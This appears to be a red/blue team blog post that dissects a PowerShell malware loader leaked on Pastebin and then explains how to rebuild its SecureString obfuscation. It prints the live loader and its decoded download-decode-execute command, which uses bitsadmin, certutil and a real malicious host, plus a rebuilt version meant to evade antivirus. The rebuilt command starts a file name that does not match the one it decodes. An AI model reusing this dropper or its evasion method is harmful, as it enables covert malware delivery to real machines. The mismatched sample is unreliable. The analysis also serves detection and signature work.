Introduction

Being part of both Red and Blue Teams we are always on the lookout for interesting Proof-of-Concepts leaked through various places such as Pastebin, Gist, Paste.ee etc. Not only do interesting samples provide a means of self-education, they serve as possible attack templates for Red Teams in the near future… and also for analysis and signature creation within the Blue Team. We do like to throw known samples back at Blue Teams 3–6 months later to check they're up to date with their signatures, and prove they're not sitting around watching Netflix all day (Joking!)

The Sample

Today I came across this particularly interesting sample https://pastebin.com/6ftvGJF4


$key = (5,3,71,2,22,67,31,121,5,5,14,17,21,82,19,13,1,34,1,7,6,1,15,13)
$Secure = "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"
$Encrypted= ConvertTo-SecureString $Secure -key $key
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted)
$ldf = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR) -replace "_TMP_",$env:tmp
$dm0 = "cmd.exe";$ldf; start-process -wiNdowStylE HiDden $dm0 $ldf;$of = nEw-obJEct -coMOBJecT wScRiPt.sheLl;$7hi = $of.popUp("Error reading file, contents are corrupted",0,"Error",5);

We had not seen anything this interesting this year (lately it's been the standard Metasploit reverse HTTP(S) payloads, Empire, Cobalt Strike, and a few Cryptominers). We thought this method was interesting as it was using the built-in Powershell cryptography in an attempt to circumvent Antivirus and other detection-based technologies. So we set about tearing this sample apart, investigating how to reverse and rebuild this particular method of obfuscation.

The decoded sample

Simply running the first few lines decodes the payload to the following:

/c bitsadmin /transfer notepadework /download /priority normal  https://themikecam.com/djkbd12/4gtns1q.txt $env:tmp\e1k2831.txt & Copy /Z $env:tmp\e1k2831.txt $env:tmp\yt5rehju.txt & certutil -decode $env:tmp\yt5rehju.txt $env:tmp\yt5rehju.exe & staRt $env:tmp\yt5rehju.exe

Using the intel report at https://urlscan.io/ip/195.123.212.206 we can see this sample has been known about for at least the last 2 months, and by the looks of things the site has been disabled (or has an IP filter for particular targets?). We can also see the well-known base64 decoding trick of converting a seemingly harmless plain text file into an executable binary. We will stop here as the site appears dead!

Reproducing a similar sample

In our search to find similar samples and PoCs we discovered the following articles from over 4 years ago:

Reversing PowerShell 'SecureString' For Fun And Profit (blog.devalias.net)

How can I use ConvertTo-SecureString (stackoverflow.com)

So this is not something new! Anyway, let's learn how to rebuild this sucker…

Our sample payload.txt:


/c bitsadmin /transfer notepadework /download /priority normal https://www.example.com/gogo/go.txt _TMP_\1234.txt & copy /z _TMP_\1234.txt _TMP_\5678.TXT & certutil -decode _TMP_\5678.TXT _TMP_\5678.exe & staRt _TMP_\12345.exe

Powershell commands:


# Same 24-byte key as the original sample (24 bytes selects AES-192)
$key = (5,3,71,2,22,67,31,121,5,5,14,17,21,82,19,13,1,34,1,7,6,1,15,13)
# Read the payload as a SecureString so it never sits in a plain $string variable
[securestring] $SecurePayload = Read-Host -AsSecureString
# ... paste the contents of payload.txt at the prompt ...
# Export it with the key; this produces the protected string the sample carries in $Secure
[string] $psProtectedString = ConvertFrom-SecureString -SecureString $SecurePayload -Key $key
$psProtectedString
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

We are then free to replace the value of the $Secure variable in the original sample at the top of the page (as we used the same key) with the contents of $psProtectedString.

PS. For our Blue Team associates we will change some more variables and the $key when we assess you in the next round of testing :)

